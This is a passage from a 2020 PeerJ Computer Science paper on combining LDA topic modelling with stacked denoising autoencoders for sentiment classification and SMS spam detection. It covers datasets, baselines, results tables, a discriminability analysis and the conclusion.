modelling of abstract concepts. The hierarchy of nodes in the network works as a distributed information processing system which proved to be beneficial in many application areas (Bengio, Courville & Vincent, 2012). In the next section we will provide further details of how we use this in our approach. Classification approach We take a supervised classification approach here. Data from each class are first transformed from a word/document space to the topics space using the topic modelling approach in “Topic Modeling”. The topic modelling features of data from both polarities Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 10/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ are then used to build a SDA model, the result of this process is C SDA networks, where C is the number of classes (sentiment polarities). The data from all classes is then passed through these networks to obtain C OREs. A classifier is trained on the OREs to predict the class. This process is outlined in Fig. 1. In this example a positive vs. negative polarity prediction is targeted. The input data can come from a wide range of resources (e.g. twitter, blogs, product reviews, structured data). LDA is built separately for the positive and negative polarities (with a preset number of topics). In the next phase two SDA networks are built, with different architectures. All the input data (negative or positive) is then passed through the LDA and SDA phases and for each sample ORE1 (positive) and ORE2 (negative) are calculated to be used by a classifier for final prediction. The motivation behind this approach can be summarised as following: � By building a separate SDA model per class the OREs are considered representative of how much a document (i.e. input sample) belongs to either polarity. Hence the two OREs provide easily separable features to the final classifier (Bengio, Courville & Vincent, 2012). � The use of topic modelling adds an extra layer of abstraction which helps combine different resources of data, handle adaptive and continuously changing input data (e.g. input from social media) and makes the SDA modelling less prone to outliers in the input space. � The resulted approach requires only two parameters: the number of topics necessary for LDA and the architecture of the two SDAs. In “Results” we analyse carefully the effect of the number of topics on the performance of the whole system. The SDA architecture is a much more difficult parameter to tune and usually depends on skilled network designer. DATA SETS AND EXPERIMENTS Here we will focus mainly on sentiment analysis data as an example of a text classification problem. Sentiment analysis covers a wide range of tasks/applications. One of the most common tasks is the analysis of product reviews (such as movies) into positive, negative and neutral (Lin & He, 2009; Maas et al., 2011; Nguyen et al., 2014; Pang, Lee & Vaithyanathan, 2002; Wu & Pao, 2012). Another popular task is the analysis of social media data and more specifically is twitter data analysis (Bravo-Marquez, Mendoza & Poblete, 2013; Saif et al., 2013; Tang et al., 2014a). In this work we study the application of our method on 10 datasets providing a wide range of data sizes and classification tasks. To unify the analysis under one framework we restrict the tasks to dual polarity problems (i.e. two classes). We limit our selection of datasets to those with manually labelled samples using average ratings by annotators to guarantee the reliability of the accuracy of results reported here. As an example of additional task is the detection of spam SMS messages. We used this dataset as a evidence of the generalisation of the our framework beyond sentiment analysis. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 11/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Table 1 summarises the datasets used including the classification task performed and the number of samples per polarity. The following is a brief description of these datasets: � IMDB Movie Review dataset (IMDB) (Maas et al., 2011): a 50,000 selected reviews from the internet movie database (IMDB) archive for sentiment analysis. A maximum of 30 reviews are allowed per movie. The dataset contains an equal number of positive and negative samples. Reviews are scored between 1 and 10. A sentiment is positive if IMDB rating ≥7 and negative if <5. Neutral reviews are not included in the dataset. � Movie Reviews: sentiment polarity datasets (Movie-Rev1) (Pang, Lee & Vaithyanathan, 2002): the data was collected from IMDB. Only reviews where the author rating was expressed either with stars or a numerical value are used. Ratings were automatically extracted and converted into positive, negative, and neutral. However, in their original paper the authors limited the analysis to only positive and negative samples. To avoid bias in the reviews a limit of 20 reviews per author was allowed. � Movie Reviews: sentiment scale datasets (Movie-Rev2) (Pang & Lee, 2005): data was also collected from IMDB from four authors. Explicit rating indicators from each document was automatically removed. Annotators are asked to rate the reviews and rank them as positive and negative with ratings averaged per review. Only negative and positive reviews at the extremes are kept. � Subjectivity datasets (Movie-Sub) (Pang & Lee, 2004): the dataset looks at subjective vs. objective phrases. For subjective phrases, the authors collected 5,000 movie review snippets from www.rottentomatoes.com. To obtain objective data, a collection of 5,000 sentences from plot summaries available from IMDB were taken. � UMICH SI650—Sentiment Classification (UMICH) (UMICH, 2011): contains data extracted from social media (blogs) with the goal of classifying the blog posts as positive or negative. Table 1 Datasets. Dataset ID Task No. polarity I No. polarity II IMDB Positive vs. Negative 12,500 12,500 Movie-Rev1 Positive vs. Negative 5,331 5,331 Movie-Rev2 Positive vs. Negative 1,000 1,000 Movie-Sub Subjective vs. Objective 5,000 5,000 UMICH Positive vs. Negative 3,091 3,995 MDSD-B Positive vs. Negative 1,000 1,000 MDSD-D Positive vs. Negative 1,000 1,000 MDSD-E Positive vs. Negative 1,000 1,000 MDSD-K Positive vs. Negative 1,000 1,000 SMS-Spam Spam vs. Ham 747 4,827 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 12/32 https://www.rottentomatoes.com http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ � Multi-Domain Sentiment Dataset (Blitzer, Dredze & Pereira, 2007): contains product reviews taken from Amazon.com from 4 product domains: books (MDSD-B), DVDs (MDSD-D), Electronics (MDSD-E) and Kitchen (MDSD-K). Each domain has several thousand reviews. Reviews contain star ratings (1–5 stars) with ratings ≥4 are labelled positive and ≤2 are labelled negative and the rest are discarded. After this filtering a 1,000 positive and 1,000 negative examples per domain are available. � SMS Spam Collection Data Set (SMS-Spam) (Almeida, Hidalgo & Yamakami, 2011): the data was collected from free or free for research sources available online. The SMS messages are manually labelled into ham (real message) and spam (unsolicited messages). Experiment setup As discussed earlier there are two parameters to be set for every dataset: (I) the number of topics used in the topic modelling phase (II) SDA architecture. For each dataset a range of possible numbers of topics was tested between 10 and 300. The architecture of the SDA per polarity per dataset was selected experimentally but all shared the need for an input layer of similar size to the number of topics and two hidden stacked layers of increasing sizes. All units had sigmoid activation functions with the learning rate is set to 0.1 and corruption rate of 30% (normally distributed). The learning algorithm ran for 100 epochs. Another important technical aspect is the classifier mentioned in “Classification Approach” to predict the sentiment. Before deciding on the best classification approach to take, we look at the separability of the features generated by the combined LDA+SDA approach compared with the projected topic modelling features on a 2D space using Principle Component Analysis (PCA) or t-Distributed Stochastic Neighbour Embedding (t-SNE). Figures 3 and 4 show with scatter plots the separability of the features for the problems tested here. The figures show from left to right: (I) ORE generated by first SDA (SDA I) vs. ORE generated by the second SDA (SDA II). (II) LDA features projected using PCA (an unsupervised linear method). (III) LDA features projected on a 2D space using the first two components of t-SNE (an unsupervised non-linear method). The results demonstrate the huge benefit of using SDA following the extraction of topic modelling features with LDA. The LDA features are massively overlapped between the classes hence it requires high dimensional features to get a reasonable accuracy. However, by using the SDA generated OREs and with only two features the separability is very high which makes it easier for even a simple linear classifier to achieve high accuracy (more formal discussion will follow in “Discriminability Analysis and Simulations”). To this end we considered three classification methods: � ORE based classifier (OBC): this is a very simple classifier where the ORE of both SDAs are compared and the sentiment associated with the smaller ORE is marked as the predicted sentiment. � Softmax SDA (SoftSDA): an additional softmax layer is added on top of the two already trained SDA models. The softmax layer transforms the output into probabilities. The sentiment corresponding to the highest probability is the predicted outcome. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 13/32 http://Amazon.com http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ � Fisher Discriminant Analysis with SDA (FDA+SDA): instead of adding a softmax layer, FDA+SDA uses the OREs from both SDAs to train an FDA classifier. FDA is particularly suitable for this task given its linear nature. To better understand the behaviour of our combined approach we compare it with four other classification methods: � Topic Modelling with SVM (TM+SVM): each document in the dataset is passed through the two LDA models for both sentiments (e.g. positive and negative). The output of both LDAs (i.e. the probabilities of the document belonging to the topics related to each sentiment) are combined to generate a feature vector. The feature vectors are classified using a support vector machine with a Gaussian kernel. � Topic Modelling with Confidence of SVMs (TM+CSVM): in this approach the LDA features of sentiment (S1) are used to build an SVM classifier to discriminate between the two sentiments (S1, S2). Similarly another SVM classifier is built based on S2 LDA features. The final classification output is decided by the SVM classifier with the highest output confidence. � Topic Modelling with Logistic Regression (TM+LR): this is equivalent to TM+SVM after replacing the SVM classifier by a regularised logistic regression one. � Topic Modelling with Confidence of LRs (TM+CLR): similar to TM+CSVM, this approach builds a separate regularised logistic regression classifier per LDA model and the confidence in the output is used to make the final decision. For every dataset we use a 10 fold cross validation approach to evaluate the accuracy of the system with a variable range of the number of topics and the seven classification strategies. “Results” details the results per dataset with comparison with the state-of-the-art of every dataset. Baseline methods To establish baseline and to compare with the state of the art methods, we implemented a list of common methods/approaches in the literature across all the datasets: � BagOfWords+SVM: bag of words is used for feature extraction and SVM is the classifier. � Bigram+SVM and Unigram+SVM: bigram/unigrams are used for feature extraction and SVM is used as the classifier. � LDA+SVM: one LDA models is built for feature extraction using all the training data, completely unsupervised. Number of topics is selected similar to the approach taken in this paper. SVM is then used as the classifier. � Lexical+SVM: sentiWordNet (Baccianella, Esuli & Sebastiani, 2010) is used to extract features that are then used by an SVM classifier. � Glove+LSTM: glove English language model as implemented in spaCy (Spacy, 2019) is used in line with a Long-Short Term Memory (LSTM) as a classifier. The optimisation of the model parameters is done independently for each test datasets as in (Hong & Fang, 2015). Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 14/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Figure 3 Feature separability of the datasets: IMDB. Movie-Rev1, Movie-Rev2, Movie-Sub, and SMS- Spam. Blue and orange represent the two polarities in the data. (A, D, G, J and M) Demonstrate the ORE generated by first SDA (SDA I) vs. ORE generated by the second SDA (SDA II) (B, E, H, K and N) LDA features projected using PCA (C, F, I, L and O) LDA features projected on a 2D space using the first components of t-SNE. Full-size DOI: 10.7717/peerj-cs.252/fig-3 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 15/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-3 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Figure 4 Feature separability of the datasets: UMICH. MDSD-B, MDSD-D, MDSD-E, and MDSD-K. Blue and orange represent the two polarities in the data. (A, D, G, J and M) demonstrate the ORE generated by first SDA (SDA I) vs. ORE generated by the second SDA (SDA II) (B, E, H, K and N) LDA features projected using PCA (C, F, I, L and O) LDA features projected on a 2D space using the first components of t-SNE. Full-size DOI: 10.7717/peerj-cs.252/fig-4 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 16/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-4 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ SVM is used for most of the base line methods as it in one of the most commonly used classifier for methods that do not use language models. A linear and Gaussian kernels were tested and a choice based on the cross-validation performance was selected. A 10 fold cross validation is used across the board including the baseline and our proposed approaches. The cross validation split is the same for all the methods with the training data used to optimise any parameters for the feature extraction and classification methods. More details about and wider range of comparisons can be found in the cited work per dataset as explained above. RESULTS Figure 5 uses a scatter plot to demonstrate the improvement in performance of our approach to the compared baseline methods in almost every dataset studied here despite the wide range of tasks and challenges offered by these sets. In Fig. 5 as most shapes in are above the equilibrium line, but a t-test does not show a significant difference p > 0.05. Glove+LSTM seems to be dominant across of the other baseline methods. Removing it from the comparison set, then our SDA base approach is significantly better with p < 0.05. This strongly suggest that the proposed approach here is comparable to the much more computationally expensive language modelling based methods. Figure 6 summarises the results achieved by all the classification approaches proposed in this study when applied on all the datasets. In the following we discuss these Figure 5 A scatter plot to compare the best in the compared baseline methods from the literature per problem to our approach. If dots are below the line it mean the results in the literature are better otherwise our approach is better. Full-size DOI: 10.7717/peerj-cs.252/fig-5 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 17/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-5 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ results in more details per dataset and compare these results to the state-of-the-art. In “Discussion” we analyse the reasons behind the advantage of our approach. IMDB movie review dataset Figure 7A details the accuracies per classification scheme which are coded in different colours and shapes. It also illustrates the change of cross validation accuracy with an increased number of topics. The methods vary in performance with FDA+SDA and OBC outperforming the rest and showing consistent results regardless of the number of features. SoftSDA achieves high accuracy but only when using a small number of topics. The classification methods that bypass SDA achieve much lower accuracies even with low number of features. Maas et al. (2011) compared their method (which uses a probabilistic LDA like method) to other common methods in the literature based on a 10 fold cross validation scheme similar to our validation approach here. Another comparison was reported by Socher et al. Figure 6 A colour map visualising the performance of the different methods on the ten datasets. The colour scale on the right of the figure clarifies the colour code with dark blue indicating low classification accuracy and dark red reflects high classification accuracy. Full-size DOI: 10.7717/peerj-cs.252/fig-6 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 18/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-6 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Figure 7 Detailed results showing the change in accuracy with number of topics and different classification schemes for the datasets: (A) IMDB, (B) Movie-Rev1, (C) Movie-Rev2, (D) Movie- Sub, (E) UMICH, and (F) MDSD-B. Full-size DOI: 10.7717/peerj-cs.252/fig-7 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 19/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-7 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ (2013) where they compared with common classifiers including Naive Bayesian (NB), SVM, biNB and RNNs. Table 2 summarises these results. Movie reviews: sentiment polarity datasets (Movie-Rev1) The parameter tuning results are presented in Fig. 7B. Similar to IMDB, FDA+SDA and OBC perform better and most consistently than the other methods on Movie-Rev1. It is interesting to notice the drop in accuracy for all those methods that do not use use SDA with the increased number of topics. Table 3 compares our results to those reported in the literature (Pang, Lee & Vaithyanathan, 2002) with OBC outperforming all the other approaches. Movie reviews: sentiment scale datasets (Movie-Rev2) FDA+SDA and OBC again outperform the other methods for this dataset (Fig. 7C). However, it is clear that the increased number of topics negatively affected the accuracy of SoftmaxSDA. Table 4 shows the superiority of our approach compared with other methods in the literature which are surveyed in detail by Maas et al. (2011) and Pang & Lee (2004). Subjectivity datasets (Movie-Sub) The previous datasets focused on negative vs. positive polarity discrimination. On the other hand Movie-Sub focuses on the task of classifying movie reviews based on their subjectivity. Figure 7D shows the detailed results while Table 5 shows our approach Table 2 IMDB results. Method Accuracy (%) BagOfWords+SVM 83.5 Bigram+SVM 89.4 Unigram+SVM 87.5 LDA+SVM 88.6 Lexical+SVM 85.4 Glove+LSTM 92.3 Our approach 85.61 Table 3 Movie-Rev1 results. Method Accuracy (%) BagOfWords+SVM 75.2 Bigram+SVM 79.1 Unigram+SVM 82.7 LDA+SVM 77.3 Lexical+SVM 72.9 Glove+LSTM 83.5 Our approach 87.28 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 20/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ performs similarly to the best in the literature with the same pattern of accuracies repeated even with the change of task. UMICH SI650—Sentiment Classification (UMICH) The data was the core part of a challenge on the machine learning competition website (Kaggle, San Francisco, CA, USA) (UMICH, 2011). Figure 7E shows accuracy as high as 96.4% with SoftmaxSDA and 250 topics, which indicates a very high performance for our approach. OBC and FDA+SDA also show above 85% accuracy with comparable results to TM+CSVM, TM+LR, and TM+CLR. The compared accuracy results are detailed in Table 6. Multi-domain sentiment dataset Dang, Zhang & Chen (2010) used a lexicon-enhanced method to extract lexical features of different sentiments to boost an SVM classifier using this dataset. A cross-domain approach was used to study the generalisation of features among different domains using these features (Bollegala, Weir & Carroll, 2013). The authors also reported the in-domain sentiment analysis accuracy, which is compared to our approach in Table 7. Finally Li et al. (2010) used a mixture of lexical features that look at the personal/impersonal views to help better separate the features used in polarity classification. The results clearly demonstrates the superiority of our approach compared with the literature and on all the sub datasets. Figures 7F and 8A–8C present the effect of feature size and classification Table 4 Movie-Rev2 results. Method Accuracy (%) BagOfWords+SVM 86.9 Bigram+SVM 88.1 Unigram+SVM 87.5 LDA+SVM 85.6 Lexical+SVM 86.4 Glove+LSTM 94.5 Our approach 98.05 Table 5 Movie-Sub results. Method Accuracy (%) BagOfWords+SVM 90.2 Bigram+SVM 93.8 Unigram+SVM 92.5 LDA+SVM 67.6 Lexical+SVM 88.6 Glove+LSTM 92.5 Our approach 90.72 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 21/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ approach on the results of the 4 datasets with FDA+SDA and OBC achieving the best results. SMS spam collection data set (SMS-Spam) Table 8 compares our approach for the problem of SMS spam filtering with the state-of-the-art on the same dataset. Our approach is on par with the highest accuracy results mentioned in the literature. Figure 8D shows that FDA+SDA scores the highest accuracy with a wide range of feature numbers. Given the data is imbalanced it is important to report complementary performance measures. Our approach has achieved: F-score = 92.13%, Precision = 95.47% and Recall = 87.58%. DISCUSSION During the topic modelling phase, LDA groups words within the text into topics with an assigned probability to each word belonging to the topic. A straight forward feature extraction method could be to use a lexical resource to assign each word within the topic with a polarity. A topic is then represented by a weighted average: Tf ¼ X w pw � sw; (8) where pw is the probability of word w belonging to topic T, P w pw ¼ 1, and sw is the polarity assigned to the word by the lexical resource. Table 6 UMICH results. Method Accuracy (%) BagOfWords+SVM 92.7 Bigram+SVM 94.6 Unigram+SVM 90.5 LDA+SVM 88.7 Lexical+SVM 91.3 Glove+LSTM 94.5 Our approach 96.4 Table 7 Multi-domain sentiment results. Method MDSD-B (%) MDSD-D (%) MDSD-E (%) MDSD-K (%) BagOfWords+SVM 77.8 80.9 84.1 84.6 Bigram+SVM 78.5 81.2 83.3 84.8 Unigram+SVM 75.1 80.4 83.4 83.9 LDA+SVM 78.5 81.6 84.2 84.5 Lexical+SVM 78.8 80.7 83.7 84.1 Glove+LSTM 90.8 92.2 94.5 93.2 Our approach 99.6 99.4 99.4 99.45 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 22/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Figure 8 Detailed results showing the change in accuracy with number of topics and different classification schemes for the datasets: (A) MDSD-D, (B) MDSD-E (C) MDSD-K, and (D) SMS- Spam. Full-size DOI: 10.7717/peerj-cs.252/fig-8 Table 8 SMS spam results. Method AUROC BagOfWords+SVM 85.4 Bigram+SVM 86.3 Unigram+SVM 84.7 LDA+SVM 82.4 Lexical+SVM 84.6 Glove+LSTM 79.8 Our approach 89.9 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 23/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-8 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Figure 9A shows the positive and negative polarities of positive and negative topics generated when building LDAs using UMICH data. The data clearly show how very well separated the features are which would make it very easy for a linear classifier to perform well. However, in Fig. 9B the same features for Movie-Rev1 data show a high degree of overlap. This exemplifies the importance of using SDA on top of LDA to extract hidden complex relationships among the words within the topics of each sentiment. The fact that for some datasets the polarity assigned by a lexical resource generates highly separable features, as in Fig. 9, could explain why in some datasets lexical based methods outperformed our approach. However, in the general case where these features are not separable enough the introduction of SDA seems to contribute to the enhanced performance. In the case of auto-encoders with squared RE, AE is equivalent to PCA (Bengio, Courville & Vincent, 2013). However, as we have shown above PCA is unable to clearly separate the sentiments. Here we used a tied-weight SDA, that is the decoding weight matrix is the inverse of the encode matrix: W′ = WT, which enforces a non-linear model. The use of denoising in SDA plays the role of regularisation (Bengio, Courville & Vincent, 2013). Regularisation constraints the representation even when it is overcomplete and makes it immune to insensitivity to small random perturbations in the input space. This motivated the increased size of layers with depth, in order to guarantee modelling the data rather than compressing it. Discriminability analysis and simulations In order to understand why the combined approach of topic modelling and SDA works well, we borrow the discriminability index (d′) concept from the signal detection theory Figure 9 Positive and negative polarity assigned by a lexical resource, SentiWordNet (Baccianella, Esuli & Sebastiani, 2010), to words within a negative and positive topic models. The x-axis repre- sents the negative polarity of a topic, while the y-axis represents the positive polarity. Points over the line means those topics have higher positive polarity, while points under the line carry more negative polarity. (A) Word sentiment from positive and negative topic models for UMICH. (B) The same plot for Movie-Rev1. Full-size DOI: 10.7717/peerj-cs.252/fig-9 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 24/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-9 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ (Green & Swets, 1966; Neri, 2010). Assume we have two overlapping distributions representing two classes (Fig. 10A). Each distribution is Gaussian with mean μi and variance σi. The goal of any learning algorithm is basically to set the decision boundary separating the two distributions in a way that maximises accuracy. Discriminability is made easier by either increasing the separation between the two means (μ1, μ2) or minimising the spread of the distribution (measured by σ1 and σ2). d′ is then defined as the ratio between separation and spread (Macmillan & Creelman, 2004): d0 ¼ m1 � m2ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 2 ðs21 þ s22Þ r : (9) d′ is a dimensionless statistic with higher values indicating better discriminability, and a higher classification accuracy as a result. We hypothesise that our approach outperforms the state of the art, due to its ability to increase the discriminability in the output of the two SDAs. This is amplified by the use of class-specific topic model to generate features for the SDAs, which in turn are able to accurately model the data at their input to generate highly discriminable features to be classified using a simple linear classifier as explained above. To test this hypothesis, we simulate the effect of changing d′ on the expected performance of a classifier. The d′i associated with each SDA output is simulated in the range (0–2). The challenge is to map back from d′i to μi and σi. Each value of d′i can be generated by an infinite combinations of μi and σi. To overcome this problem, we use a Monte Carlo approach to model the joint distribution p(d′, μ, σ). It is now possible to obtain acceptable values for μi, σi given the simulated d′i value. Details of similar approach can be found in (Neri, 2010). To calculate the classification accuracy, for each simulated point (d′1, d′2) a synthetic data of 1,000 samples is generated from a two-component two dimensional Gaussian mixture Figure 10 (A) Schematic description of the concept of d′; (B) simulations of the effect of changing d′ of SDA I and d′ of SDA II on the classification accuracy. Full-size DOI: 10.7717/peerj-cs.252/fig-10 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 25/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-10 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ distribution (GMM) with mean (μ1, μ2), a diagonal covariance matrix (σ1, σ2), and equal mixing coefficients of 0.5. The generated samples are classified using a FDA classifier. The process is repeated 100 times for each point in the simulation space and the average values are reported in Fig. 10B. In the figure a brighter colour indicate higher classification accuracy. It is clear with the increase of d′ on either or both axes results in higher classification accuracy. The black dots show (d′1, d′2) of the output of SDA I and SDA II for all the datasets presented above. The white dots are those produced from the output of the topic modelling without SDA. It is very clear the effect SDA has on the discriminability of the data and hence the accuracy of the overall classifier. These finding are very important in demonstrating the effect SDA has when combined with topic modelling in the approach described above. It suggests that LDA trained on data from one class helps suppressing the other class(s), SDA then is able to model the inter-dependencies in a way that increases discriminability. This suggest that this approach can be used in other areas beyond sentiment analysis and for larger number of classes. CONCLUSION This work presented a novel framework for text classification that combines topic modelling with deep stacked AE to generate highly separable features that are then easily classified using a simple linear classifier. The approach transforms the sentiment analysis problem from the space of words (in approaches such as bag of words, and lexical sentiment corpora) to the topics space. This is especially useful as it incorporates the context information within the mixture model of topics (using LDA). To model the class-specific information SDA plays the role of finding structural correlations among topics without any strong assumption on the model. This combination of feature extraction methods results in a semi-automatic approach with minimum feature engineering and number of parameters to tune. To demonstrate the effectiveness of our approach we used 10 benchmark datasets for various tasks in sentiment analysis and a wide range of data size and class bias. Tasks included negative/positive product and movie reviews, subjectivity of movie reviews, and spam filtering. As presented in the previous section our approach achieves significantly higher accuracies than the best reported in the literature for most of the tested datasets. This and the fact that it requires very little feature engineering makes the approach very attractive for various applications in many domains. LDA allows for adaptive learning (a feature of Gibbs sampling and variational Bayesian methods) which is a very useful feature for Big Data and streaming applications. SDAs can also be trained in an online manner making the whole system adaptive especially in areas such as micro-blogging and social media. The work presented here is designed to provide a framework for text classification tasks. Every component in this framework could be replaced by another method. LDA could for example be replaced by TSM or JST. SDA could be replaced by other representational learning algorithms including Restrictive Boltzmann Machines (RBM) or RNNs (RNN). It can also be easily extended to multiple class problems using one-vs-one or one-vs-all methods. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 26/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ The discriminability analysis presented here provides explanation of why SDA and LDA work well within the presented framework. The analysis further support the claims made in this paper that SDA is able to model the complex structure of class-specific topics and separate them to achieve high classification accuracy. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work was funded by EPSRC UK. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: EPSRC UK. Competing Interests The authors declare that they have no competing interests. Author Contributions � Noura Al Moubayed conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Stephen McGough conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Bashar Awwad Shiekh Hasan conceived and designed the experiments, analysed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code used to generate the topic modelling data is available as in the Supplemental File. The data is publicly available at the following locations: IMDB Movie Review dataset (IMDB): http://ai.stanford.edu/~amaas/data/sentiment/. Movie Reviews: Sentiment polarity datasets (Movie-Rev1): https://www.kaggle.com/ nltkdata/sentence-polarity. Movie Reviews: Sentiment scale datasets (Movie-Rev2): https://www.kaggle.com/ nltkdata/movie-review. Subjectivity datasets (Movie-Sub): https://www.kaggle.com/nltkdata/subjectivity. UMICH SI650—Sentiment Classification (UMICH): https://www.kaggle.com/ seesea0203/umich-si650-nlp. SMS Spam Collection Data Set (SMS-Spam): https://www.kaggle.com/uciml/sms- spam-collection-dataset/discussion/83197. MDSD is available (Multi-Domain Sentiment Dataset (MDSD) at: https://www.cs.jhu. edu/~mdredze/datasets/sentiment/index2.html. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 27/32 http://dx.doi.org/10.7717/peerj-cs.252#supplemental-information http://ai.stanford.edu/~amaas/data/sentiment/ https://www.kaggle.com/nltkdata/sentence-polarity https://www.kaggle.com/nltkdata/sentence-polarity https://www.kaggle.com/nltkdata/movie-review https://www.kaggle.com/nltkdata/movie-review https://www.kaggle.com/nltkdata/subjectivity https://www.kaggle.com/seesea0203/umich-si650-nlp https://www.kaggle.com/seesea0203/umich-si650-nlp https://www.kaggle.com/uciml/sms-spam-collection-dataset/discussion/83197 https://www.kaggle.com/uciml/sms-spam-collection-dataset/discussion/83197 https://www.cs.jhu.edu/~mdredze/datasets/sentiment/index2.html https://www.cs.jhu.edu/~mdredze/datasets/sentiment/index2.html http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.252#supplemental-information. REFERENCES Agarwal A, Xie B, Vovsha I, Rambow O, Passonneau R. 2011. Sentiment analysis of Twitter data. In: Proceedings of the Workshop on Languages in Social Media, LSM ’11. Stroudsburg: Association for Computational Linguistics, 30–38. Al Moubayed N, Wall D, McGough AS. 2017. Identifying changes in the cybersecurity threat landscape using the LDA-web topic modelling data search engine. In: International Conference on Human Aspects of Information Security, Privacy, and Trust. Cham: Springer, 287–295. Alain G, Bengio Y. 2014. What regularized auto-encoders learn from the data-generating distribution. Journal of Machine Learning Research 15(1):3563–3593. Almeida TA, Hidalgo JMG, Yamakami A. 2011. Contributions to the study of sms spam filtering: new collection and results. In: Proceedings of the 11th ACM Symposium on Document Engineering. New York: ACM, 259–262. AlMoubayed N, Breckon T, Matthews P, McGough S. 2016. Sms spam filtering using probabilistic topic modelling and stacked denoising autoencoder. In: 25th International Conference on Artificial Neural Networks. Cham: Springer, 423–430. Baccianella S, Esuli A, Sebastiani F. 2010. Sentiwordnet 3.0: an enhanced lexical resource for sentiment analysis and opinion mining. In: Proceedings of the Seventh International Conference on Language Resources and Evaluation (LREC'10). Vol. 10, 2200–2204. Bengio Y. 2009. Learning deep architectures for AI. Foundations and Trends® in Machine Learning 2(1):1–127 DOI 10.1561/2200000006. Bengio Y, Courville A, Vincent P. 2013. Representation learning: a review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence 35(8):1798–1828 DOI 10.1109/TPAMI.2013.50. Bengio Y, Courville AC, Vincent P. 2012. Unsupervised feature learning and deep learning: a review and new perspectives. Available at http://arxiv.org/abs/1206.5538. Blei D, Carin L, Dunson D. 2010. Probabilistic topic models. IEEE Signal Processing Magazine 27(6):55–65 DOI 10.1109/MSP.2010.938079. Blei DM. 2012. Probabilistic topic models. Communications of the ACM 55(4):77–84 DOI 10.1145/2133806.2133826. Blei DM, Ng AY, Jordan MI. 2003. Latent Dirichlet allocation. Journal of Machine Learning Research 3(4–5):993–1022. Blitzer J, Dredze M, Pereira F. 2007. Biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. In: Proceedings of the 45th Annual Meeting of the Association of Computational Linguistics. Prague: Association for Computational Linguistics, Vol. 7, 440–447. Bollegala D, Weir D, Carroll J. 2013. Cross-domain sentiment classification using a sentiment sensitive thesaurus. IEEE Transactions on Knowledge and Data Engineering 25(8):1719–1731 DOI 10.1109/TKDE.2012.103. Bourlard H, Kamp Y. 1988. Auto-association by multilayer perceptrons and singular value decomposition. Biological Cybernetics 59(4–5):291–294 DOI 10.1007/BF00332918. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 28/32 http://dx.doi.org/10.7717/peerj-cs.252#supplemental-information http://dx.doi.org/10.7717/peerj-cs.252#supplemental-information http://dx.doi.org/10.1561/2200000006 http://dx.doi.org/10.1109/TPAMI.2013.50 http://arxiv.org/abs/1206.5538 http://dx.doi.org/10.1109/MSP.2010.938079 